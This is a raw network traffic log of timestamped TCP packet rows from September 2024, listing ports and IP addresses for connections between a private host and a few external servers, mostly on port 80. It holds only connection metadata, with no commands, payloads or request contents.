Sep 27, 2024 04:21:15.769198895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769211054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769217968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769292116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769303083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769314051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769325018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769326925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769326925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769335985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769380093 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769380093 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769396067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769478083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769489050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769535065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.774880886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.774903059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.774914980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.774924994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.774939060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.774947882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.774962902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.774962902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775022030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775047064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775058031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775068998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775101900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775114059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775126934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775136948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775147915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775160074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775170088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775191069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775191069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775219917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775379896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775413990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775424957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775449991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775449991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775470018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775480032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775491953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775502920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.775547981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.775547981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776402950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776453018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776454926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776467085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776505947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776516914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776546001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776546001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776571989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776583910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776607037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776618004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776643038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776643038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776680946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776721001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776731968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776741982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776753902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776766062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776772022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776778936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776804924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776817083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776819944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776849031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776859045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776863098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776863098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776899099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776906967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776918888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776932001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776942968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776942968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776942968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.776971102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.776982069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777009010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777015924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777015924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777064085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777076006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777086973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777101994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777101994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777115107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777146101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777173996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777175903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777189016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777200937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777229071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777250051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777309895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777321100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777331114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777342081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777359009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777379036 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777379036 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777396917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777405977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777417898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777468920 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777482033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777494907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777533054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777569056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777580023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777590036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777600050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777611971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777623892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777637005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777637005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777712107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777717113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777729988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777743101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777754068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777762890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777793884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777793884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777841091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777854919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777864933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777875900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777884007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777884007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777889013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777905941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777916908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.777951002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.777951002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778050900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778060913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778072119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778084993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778098106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778109074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778120041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778126001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778126001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778145075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778187037 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778220892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778237104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778248072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778259993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778270960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778285980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778306961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778318882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778331041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778357983 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778357983 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778443098 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778459072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778469086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778479099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778489113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778500080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778515100 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778515100 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778546095 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778549910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778563023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.778611898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.778611898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.790271044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790282965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790304899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790338993 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.790344954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790359020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790370941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790388107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790389061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.790389061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.790443897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.790443897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.790533066 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790544987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790555954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790565968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790575981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790587902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790599108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.790605068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.790646076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.790646076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.797115088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.797127008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.797137022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.797173977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.797197104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.797200918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.797209024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.797221899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.797260046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.797260046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.800492048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800549030 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.800556898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800573111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800590992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800602913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800609112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.800615072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800627947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800632000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.800649881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.800652981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.800677061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.800703049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.808806896 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.823726892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.823741913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.823760033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.823771000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.823781967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.823792934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.823797941 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.823808908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.823836088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.823888063 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.830434084 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.830542088 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.831739902 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.835701942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835733891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835746050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835792065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835803032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835813999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835814953 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.835814953 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.835827112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835845947 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.835846901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.835897923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.835901022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835912943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835922956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835952044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.835979939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.835987091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.835997105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836008072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836055994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.836055994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.836074114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836086035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836168051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.836522102 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.836858988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836931944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.836934090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836946011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836956024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836968899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836978912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.836987972 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.836996078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.837008953 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.837013960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.837027073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.837032080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.837059975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.837059975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.843133926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843148947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843162060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843198061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843208075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843218088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843230009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843230009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.843240976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843269110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.843296051 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.843588114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843600035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843609095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843619108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843631029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843647003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843647957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.843660116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.843678951 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.843707085 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844388008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844400883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844419956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844430923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844445944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844461918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844461918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844461918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844474077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844510078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844540119 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844547987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844559908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844569921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844592094 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844616890 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844647884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844660044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844670057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844680071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844748974 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844768047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844779015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844784975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844791889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844805002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844815016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844826937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844846010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844871998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.844886065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.844897985 CEST	80	49724	176.113.115.95	192.168.2.5
